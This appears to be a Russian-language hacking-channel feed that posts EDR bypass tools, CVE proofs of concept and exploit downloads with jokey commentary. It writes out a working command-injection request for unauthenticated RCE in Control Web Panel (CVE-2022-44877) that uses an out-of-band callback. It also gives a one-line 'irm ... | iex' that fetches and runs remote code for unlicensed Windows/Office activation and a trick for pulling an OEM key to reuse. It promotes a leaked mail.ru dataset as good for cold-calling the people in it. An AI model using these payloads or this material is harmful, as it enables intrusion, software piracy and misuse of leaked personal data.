UnhookingPatch
Bypass EDR

download

ААА сука, в голосину)))))))))))))))
Linux find Windows 10/11 OEM product key command
*
Был ноут с windows, поставили linux, но ключ от винды хотим "подарить" ?)))
sudo cat /sys/firmware/acpi/tables/MSDM | tail -1

Смешное

FilelessNtdllReflection
Еще один Bypass Userland EDR
download

#bypassEDR

Malware Analysis Series (MAS): Article 7
Опа, седьмая часть вышла !
PDF

#malware #destroy #happy

Расходимся, мы тут лишние
читать всю статью

CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:

POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded

username=root&password=toor&commit=Login

CVE-2022-31705
POC
Geekpwn 2022 Vmware EHCI OOB
download

ChatGPT_PoC - продолжаем наблюдение ))))

#openAI

Атаки на банкоматы с использованием вредоносного ПО
AzaZA
все как вы любите

ChatGPT
Ultimate Resource Guide
WoW

Exploit for CVE-2022-20452
privilege escalation on Android from installed app to system app (or another app)
downLoad

#android #exploit

Активация windows и office
Быстрый способ без всяких KMS_auto
usage:
PowerShell от админа и вставляем:

irm https://massgrave.dev/get | iex

и выбираем нужный пункт, ВСЁ

или так
Ну мало ли Вам нужно.

Списки docker образов для прокачки Пентеста
for pentesterts

CVE-2023-0210
В новый год, с новыми дырами
Flaw in Linux Kernel Allows Unauthenticated remote DOS Attacks
POC - ручками наберете

#linux #kernel

CVE-2023-21752
Свежайшая Дыра (от 10 января) в службе резервного копирования Windows
LPE от юзера до системы
About vuln
exploit

#windows #exploit #lpe

CVE-2022-3656
*
Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.
Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера.

Новость по утечке в mail.ru - шляпа.
И ничего полезного в ней нет. Разве что чисто на прозвон
3505917 строк